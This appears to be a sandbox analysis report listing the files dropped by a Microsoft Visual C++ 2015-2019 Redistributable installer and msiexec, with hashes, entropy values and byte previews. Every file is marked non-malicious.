                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.x./.2.0.1.0./.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a.".>..... . .<.W.i.x.B.a.l.C.o.n.d.i.t.i.o.n. .C.o.n.d.i.t.i.o.n.=.".V.e.r.s.i.o.n.N.T.6.4. .&.g.t.;.=. .v.6...0. .O.R. .(.V.e.r.s.i.o.n.N.T.6.4. .=. .v.5...2. .A.N.D. .S.e.r.v.i.c.e.P.a.c.k.L.e.v.e.l. .&.g.t.;.=. .1.).". .M.e.s.s.a.g.e.=.".[.W.i.x.B.u.n.d.l.e.N.a.m.e.]. .c.a.n. .o.n.l.y. .b.e. .i.n.s.t.a.l.l.e.d. .o.n. .W.i.n.d.o.w.s. .X.P. .S.P.1. .(.x.6.4.). .a.n.d. .n.e.w.e.r. .p.l.a.t.f.o.r.m.s...". ./.>..... . .<.W.i.x.B.u.n.d.l.e.P.r.o.p.e.r.t.i.e.s. .D.i.s.p.l.a.y.N.a.m.e.=.".M.i.c.r.o.s.o.f.t. .V.i.s.u.a.l. .C.+.+. .2.0.1.5.-.2.0.1.9. .R.e.d.i.s.t.r.i.b.u.t.a.b.l.e. .(.x.6.4.). .-. .1.4...2.1...2.7.7.0.2.". .L.o.g.P.a.t.h.V.a.r.i.a.b.l.e.=.".W.i.x.B.u.n.d.l.e.L.o.g.". .C.o.m.p.r.e.s.s.e.d.=.".y.e.

                                                                        C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\license.rtf

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):9046
                                                                        Entropy (8bit):5.157073875669985
                                                                        Encrypted:false
                                                                        SSDEEP:192:W8lZ1UVDWkgWZTIsvPhghtQ1Qf4lCfnEtHixEGx736wHqItfSpOy2:9T15WZMgAYlOnjt5HLoL2
                                                                        MD5:2EABBB391ACB89942396DF5C1CA2BAD8
                                                                        SHA1:182A6F93703549290BCDE92920D37BC1DEC712BB
                                                                        SHA-256:E3156D170014CED8D17A02B3C4FF63237615E5C2A8983B100A78CB1F881D6F38
                                                                        SHA-512:20D656A123A220CD3CA3CCBF61CC58E924B44F1F0A74E70D6850F39CECD101A69BCE73C5ED14018456E022E85B62958F046AA4BD1398AA27303C2E86407C3899
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset0 Garamond;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 MICROSOFT SOFTWARE LICENSE TERMS\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 These license terms are an agreement between Microsoft Corporation (or based on where you live, one of its affiliates) and you. They apply to the software named above. The terms also apply to any Microsoft services or updates for the software, except to the extent those have different terms.\par..\b IF YOU COMPLY WITH THESE LICENSE TERMS, YOU HAVE THE RIGHTS BELOW.\par....\pard{\pntext\f2\'B7\tab}{\*\pn\pnlvlblt\pnf2\pnindent360{\pntxtb\'B7}}\fi-357\li357\sb120\sa120\sl240\slmult1\tx360 INSTALLATION AND USE RIGHTS. \b0\par....\pard{\pntext\f2\'B7\tab}{\*\pn\pnlvlblt\pnf2\pnindent360{\pntxtb\'B7}}\fi-363\

                                                                        C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\logo.png

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:PNG image data, 64 x 64, 8-bit colormap, non-interlaced
                                                                        Category:dropped
                                                                        Size (bytes):1861
                                                                        Entropy (8bit):6.868587546770907
                                                                        Encrypted:false
                                                                        SSDEEP:24:q36cnTKM/3kTIQiBmYKHeQWalGt1Sj9kYIt1uZ+bYOQe0IChR95aW:qqiTKMPuUBm7eQJGtYJM1uZCVszaW
                                                                        MD5:D6BD210F227442B3362493D046CEA233
                                                                        SHA1:FF286AC8370FC655AEA0EF35E9CF0BFCB6D698DE
                                                                        SHA-256:335A256D4779EC5DCF283D007FB56FD8211BBCAF47DCD70FE60DED6A112744EF
                                                                        SHA-512:464AAAB9E08DE610AD34B97D4076E92DC04C2CDC6669F60BFC50F0F9CE5D71C31B8943BD84CEE1A04FB9AB5BBED3442BD41D9CB21A0DD170EA97C463E1CE2B5B
                                                                        Malicious:false
                                                                        Preview:.PNG........IHDR...@...@.............sRGB.........gAMA......a.....PLTE].q^.r_.r_.s`.s`.s`.ta.ta.ub.ub.vc.vd.vd.vd.we.we.xe.xg.yg yg zh zh"zi"{j#|i${j$|n*~n*.n,.o,.p..q0.r2.s3.t5.x;.x<.y>.z?.|B.~C.}E..F..F..H..I..J..L..O..P..W..Y..^..a..c..g..i..q..r..}.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................S......pHYs..%...%....^.....tEXtSoftware.Paint.NET v3.5.100.r.....IDATXG..iW.@...EJ.$M...`AEpG..7TpWT@\.."....(..(.._;...di:9.c>q..g....T...._...-....F..+..w.

                                                                        C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\thm.wxl

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):2952
                                                                        Entropy (8bit):5.052095286906672
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTl/+desK19hDUNKwsqq8+JIDxN3mt7NlN1NVvAdMcgLPDHVXK8KTKjKnSnYF:uDiTl/BbTxmup/vrxATd
                                                                        MD5:FBFCBC4DACC566A3C426F43CE10907B6
                                                                        SHA1:63C45F9A771161740E100FAF710F30EED017D723
                                                                        SHA-256:70400F181D00E1769774FF36BCD8B1AB5FBC431418067D31B876D18CC04EF4CE
                                                                        SHA-512:063FB6685EE8D2FA57863A74D66A83C819FE848BA3072B6E7D1B4FE397A9B24A1037183BB2FDA776033C0936BE83888A6456AAE947E240521E2AB75D984EE35E
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29" />.... <String Id="Caption">[WixBundleName] Setup</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Are you sure you want to cancel?</String>.. <String Id="HelpHeader">Setup Help</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - installs, repairs, uninstalls or.. creates a complete local copy of the bundle in directory. Install is the default...../passive | /quiet - displays minimal UI with no prompts or displays no UI and.. no prompts. By default UI and all prompts are displayed...../norestart - suppress any attempts to restart. By default UI will prompt before restart.../log log.txt - logs to a specific file. B

                                                                        C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\thm.xml

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):8332
                                                                        Entropy (8bit):5.184632608060528
                                                                        Encrypted:false
                                                                        SSDEEP:96:8L2HdQG+3VzHfz96zYFGaPSWXdhRAmImlqFQKFBiUxn7Ke5A82rkO/pWk3nswP:ZHAzZ/3
                                                                        MD5:F62729C6D2540015E072514226C121C7
                                                                        SHA1:C1E189D693F41AC2EAFCC363F7890FC0FEA6979C
                                                                        SHA-256:F13BAE0EC08C91B4A315BB2D86EE48FADE597E7A5440DCE6F751F98A3A4D6916
                                                                        SHA-512:CBBFBFA7E013A2B85B78D71D32FDF65323534816978E7544CA6CEA5286A0F6E8E7E5FFC4C538200211F11B94373D5658732D5D8AA1D01F9CCFDBF20F154F1471
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. Copyright (c) .NET Foundation and contributors. All rights reserved. Licensed under the Microsoft Reciprocal License. See LICENSE.TXT file in the project root for full license information. -->......<Theme xmlns="http://wixtoolset.org/schemas/thmutil/2010">.. <Window Width="485" Height="300" HexStyle="100a0000" FontId="0">#(loc.Caption)</Window>.. <Font Id="0" Height="-12" Weight="500" Foreground="000000" Background="FFFFFF">Segoe UI</Font>.. <Font Id="1" Height="-24" Weight="500" Foreground="000000">Segoe UI</Font>.. <Font Id="2" Height="-22" Weight="500" Foreground="666666">Segoe UI</Font>.. <Font Id="3" Height="-12" Weight="500" Foreground="000000" Background="FFFFFF">Segoe UI</Font>.. <Font Id="4" Height="-12" Weight="500" Foreground="ff0000" Background="FFFFFF" Underline="yes">Segoe UI</Font>.... <Image X="11" Y="11" Width="64" Height="64" ImageFile="logo.png" Visible="yes"/>.. <Text X="80" Y="11" Width="-11" Heig

                                                                        C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\wixstdba.dll

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):195600
                                                                        Entropy (8bit):6.682530937585544
                                                                        Encrypted:false
                                                                        SSDEEP:3072:OXoiFK6b0k77I+QfaIl191rSJHvlalB+8BHkY6v53EfcUzN0m6I+WxBlnKzeZuqt:OXoQNb++gDrSJdr8BHkPh3wIgnK/IU1a
                                                                        MD5:EAB9CAF4277829ABDF6223EC1EFA0EDD
                                                                        SHA1:74862ECF349A9BEDD32699F2A7A4E00B4727543D
                                                                        SHA-256:A4EFBDB2CE55788FFE92A244CB775EFD475526EF5B61AD78DE2BCDFADDAC7041
                                                                        SHA-512:45B15ADE68E0A90EA7300AEB6DCA9BC9E347A63DBA5CE72A635957564D1BDF0B1584A5E34191916498850FC7B3B7ECFBCBFCB246B39DBF59D47F66BC825C6FD2
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3..R...R...R..h.N..R..h.L.R..h.M..R.......R.......R.......R...*<..R...*,..R...R...S..K....R..K....R..N.@..R...R(..R..K....R..Rich.R..................PE..L......Z...........!................d.....................................................@..............................................................D......,.......T...............................@...............X............................text............................... ..`.rdata.............................@..@.data...............................@....gfids..............................@..@.rsrc...............................@..@.reloc..,...........................@..B........................................................................................................................................................................................................................................

                                                                        C:\Windows\Temp\~DF21ACBD4BD5AEDD2E.TMP

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):512
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3::
                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                        Malicious:false
                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Windows\Temp\~DF248711BC318B51AB.TMP

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):512
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3::
                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                        Malicious:false
                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Windows\Temp\~DF2593AB4ADB5FCD16.TMP

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):69632
                                                                        Entropy (8bit):0.14204316576173026
                                                                        Encrypted:false
                                                                        SSDEEP:48:tpZMc9EVmS9S26NRSc8k089dO6I6RLjxLp:TZMcsmkyREeP8aLVL
                                                                        MD5:52895B887E65131A0BE401E362EC67B2
                                                                        SHA1:77FB6897246AC51BD980B5066084BF905A8A1B34
                                                                        SHA-256:E02233823A167B3AC6D8AC60F3770E019A8772D930CFB851F67AC8EEB204577A
                                                                        SHA-512:F1BACD22FC1E5016F20A07A56EF88C56447DA6ED9B135308AA87460FCABB68F5D18DAB90E523A78A976F12391EB137BD43F76704B3B88C019D07D9D52E3C503F
                                                                        Malicious:false
                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Windows\Temp\~DF2F4A160F74681BDB.TMP

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                        Category:dropped
                                                                        Size (bytes):32768
                                                                        Entropy (8bit):1.2460547016397883
                                                                        Encrypted:false
                                                                        SSDEEP:48:kGzuos4vFXiKT50YxdpI6jeBS2nQRSc8k0SItZQ:Lz7/T7Co+0REfhZ
                                                                        MD5:555BC64421B0BFA3EE9723C3F23D6344
                                                                        SHA1:A90430D1C1D107F09A74F4B90996059783472D79
                                                                        SHA-256:4AC31B291A9623068DFF6CB575B57BFFB45D97C7E5E984AF0DA268A2BCE06D93
                                                                        SHA-512:4FF8485FA7822EB5D9B17BA8624E6CBB34B05B227D85A1AF1C792496175B3C75DFAF6F9D06596221372140639E325EED9B868ADFB235440B01F8AE56A4A979FB
                                                                        Malicious:false
                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Windows\Temp\~DF342109291316C010.TMP

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):1.5584159664956596
                                                                        Encrypted:false
                                                                        SSDEEP:48:f8PhruRc06WXinFT5XYxdpI6jeBS2nQRSc8k0SItZQ:ehr1pFT2Co+0REfhZ
                                                                        MD5:97A0A76E097AA4380AC58513CF1E33C3
                                                                        SHA1:EEE2F98AF2AD83976B7E99BBCE61BB1FD02BC08B
                                                                        SHA-256:55B21841BD643EADF86864A3CB6EDE1E3FAF2CABB11812B316704B4D3D4F926F
                                                                        SHA-512:B0E5C6A5F7951533201442C7A3098AB857724E73EB9DA8352E5DD0218984FE4F8E31525B1FD67642AB83D5299E47FAEC2B59248845B9C6ACB08CD71DC8964D4E
                                                                        Malicious:false
                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Windows\Temp\~DF363D342F2BFA0AA8.TMP

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):1.5638666227546747
                                                                        Encrypted:false
                                                                        SSDEEP:48:x8PhruRc06WXi7FT5XhdO6I6RLjxL3m4S26NRSc8k0SIVoZMc9d:Mhr11FTd8aLVL3zyREfJoZMc
                                                                        MD5:01077FAD9CBC96BD8733EEF5BC7C3E9A
                                                                        SHA1:48C3949FEF321FE01B49CF2766FD22EC6F4A4B92
                                                                        SHA-256:7A60B5E0B869C6A9BC222DE88D686151CC4BF8D39054648E5E6C7835BA6020F2
                                                                        SHA-512:12E7FE05916FE420EF9138CA152D0CBE79E9677475E68A45DD41AC0F60EE97ECA0417596E6259E27B70D5872391A70C373374479F6E20B64C9BECE822D50623C
                                                                        Malicious:false
                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Windows\Temp\~DF36887D29C8594090.TMP

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):32768
                                                                        Entropy (8bit):0.1020252931328785
                                                                        Encrypted:false
                                                                        SSDEEP:6:xPLG7iVCnLG7iVrKOzPLHKOs0zW4eM9Ra1SSL8QxMIliVky6lJl0t/:50i8n0itFzDHFsmgsaQ48QGIDr01
                                                                        MD5:33D7B88BD0D369F5A382C4927D653329
                                                                        SHA1:663FDCF5438F5711E8BAD620EEDE7506787BB0D9
                                                                        SHA-256:6C3413EDBEC0D920F270D712FD7A223C3455D0BD807D3C861C307026E3D693AB
                                                                        SHA-512:2AF548DD7D6B6661EE770BEC34B7DE9ED78F68A0A5898CFD22CDB41DB3C9EBCFD4A4A6A6CF19A56C46AE79C7EA3585E35D8DC014DF9C39DF6AB18CC643FEFD42
                                                                        Malicious:false
                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Windows\Temp\~DF4C4C1C462D76676C.TMP

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                        Category:dropped
                                                                        Size (bytes):32768
                                                                        Entropy (8bit):1.2460547016397883
                                                                        Encrypted:false
                                                                        SSDEEP:48:kGzuos4vFXiKT50YxdpI6jeBS2nQRSc8k0SItZQ:Lz7/T7Co+0REfhZ
                                                                        MD5:555BC64421B0BFA3EE9723C3F23D6344
                                                                        SHA1:A90430D1C1D107F09A74F4B90996059783472D79
                                                                        SHA-256:4AC31B291A9623068DFF6CB575B57BFFB45D97C7E5E984AF0DA268A2BCE06D93
                                                                        SHA-512:4FF8485FA7822EB5D9B17BA8624E6CBB34B05B227D85A1AF1C792496175B3C75DFAF6F9D06596221372140639E325EED9B868ADFB235440B01F8AE56A4A979FB
                                                                        Malicious:false
                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Windows\Temp\~DF5480B70D7B1DBA9E.TMP

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                        Category:dropped
                                                                        Size (bytes):32768
                                                                        Entropy (8bit):1.2501246123707326
                                                                        Encrypted:false
                                                                        SSDEEP:48:+8zuas4vFXiOT50hdO6I6RLjxL3m4S26NRSc8k0SIVoZMc9d:7z1zTM8aLVL3zyREfJoZMc
                                                                        MD5:17A5479331AB427E4C172AD25EDB9C3D
                                                                        SHA1:0A19E88113A2910EBF96BA57C3FB65D92F5EC390
                                                                        SHA-256:892700FA4C3B9CFC108BA9592F19FC9CADCC29611C24BB5A398A496BFD566407
                                                                        SHA-512:587FEE6699C42D264F12AAA2FCCEFEE0E333574CAF473FA1B6C666CABA525F11D7FB35030A4EFAE9DFF85EB7D8BACF4DC90C7068E9AE31E3C67C01752D2D2E20
                                                                        Malicious:false
                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Windows\Temp\~DF5576FE1DC5697F45.TMP

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):1.5638666227546747
                                                                        Encrypted:false
                                                                        SSDEEP:48:x8PhruRc06WXi7FT5XhdO6I6RLjxL3m4S26NRSc8k0SIVoZMc9d:Mhr11FTd8aLVL3zyREfJoZMc
                                                                        MD5:01077FAD9CBC96BD8733EEF5BC7C3E9A
                                                                        SHA1:48C3949FEF321FE01B49CF2766FD22EC6F4A4B92
                                                                        SHA-256:7A60B5E0B869C6A9BC222DE88D686151CC4BF8D39054648E5E6C7835BA6020F2
                                                                        SHA-512:12E7FE05916FE420EF9138CA152D0CBE79E9677475E68A45DD41AC0F60EE97ECA0417596E6259E27B70D5872391A70C373374479F6E20B64C9BECE822D50623C
                                                                        Malicious:false
                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Windows\Temp\~DF681981EADBE2381D.TMP

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                        Category:dropped
                                                                        Size (bytes):32768
                                                                        Entropy (8bit):1.2460547016397883
                                                                        Encrypted:false
                                                                        SSDEEP:48:kGzuos4vFXiKT50YxdpI6jeBS2nQRSc8k0SItZQ:Lz7/T7Co+0REfhZ
                                                                        MD5:555BC64421B0BFA3EE9723C3F23D6344
                                                                        SHA1:A90430D1C1D107F09A74F4B90996059783472D79
                                                                        SHA-256:4AC31B291A9623068DFF6CB575B57BFFB45D97C7E5E984AF0DA268A2BCE06D93
                                                                        SHA-512:4FF8485FA7822EB5D9B17BA8624E6CBB34B05B227D85A1AF1C792496175B3C75DFAF6F9D06596221372140639E325EED9B868ADFB235440B01F8AE56A4A979FB
                                                                        Malicious:false
                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Windows\Temp\~DF705C7911B233634C.TMP

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):512
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3::
                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                        Malicious:false
                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Windows\Temp\~DF71F691DB9BEE7517.TMP

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                        Category:dropped
                                                                        Size (bytes):32768
                                                                        Entropy (8bit):1.2460547016397883
                                                                        Encrypted:false
                                                                        SSDEEP:48:kGzuos4vFXiKT50YxdpI6jeBS2nQRSc8k0SItZQ:Lz7/T7Co+0REfhZ
                                                                        MD5:555BC64421B0BFA3EE9723C3F23D6344
                                                                        SHA1:A90430D1C1D107F09A74F4B90996059783472D79
                                                                        SHA-256:4AC31B291A9623068DFF6CB575B57BFFB45D97C7E5E984AF0DA268A2BCE06D93
                                                                        SHA-512:4FF8485FA7822EB5D9B17BA8624E6CBB34B05B227D85A1AF1C792496175B3C75DFAF6F9D06596221372140639E325EED9B868ADFB235440B01F8AE56A4A979FB
                                                                        Malicious:false
                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Windows\Temp\~DF7223972F1DE4D577.TMP

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):512
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3::
                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                        Malicious:false
                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Windows\Temp\~DF7EA4C7E421C65683.TMP

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):512
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3::
                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                        Malicious:false
                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Windows\Temp\~DF8407E4F7C441EE1D.TMP

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):512
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3::
                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                        Malicious:false
                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Windows\Temp\~DF87911A9A72AEBB22.TMP

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):512
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3::
                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                        Malicious:false
                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Windows\Temp\~DF93CB400230F8629B.TMP

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                        Category:dropped
                                                                        Size (bytes):32768
                                                                        Entropy (8bit):1.2501246123707326
                                                                        Encrypted:false
                                                                        SSDEEP:48:+8zuas4vFXiOT50hdO6I6RLjxL3m4S26NRSc8k0SIVoZMc9d:7z1zTM8aLVL3zyREfJoZMc
                                                                        MD5:17A5479331AB427E4C172AD25EDB9C3D
                                                                        SHA1:0A19E88113A2910EBF96BA57C3FB65D92F5EC390
                                                                        SHA-256:892700FA4C3B9CFC108BA9592F19FC9CADCC29611C24BB5A398A496BFD566407
                                                                        SHA-512:587FEE6699C42D264F12AAA2FCCEFEE0E333574CAF473FA1B6C666CABA525F11D7FB35030A4EFAE9DFF85EB7D8BACF4DC90C7068E9AE31E3C67C01752D2D2E20
                                                                        Malicious:false
                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

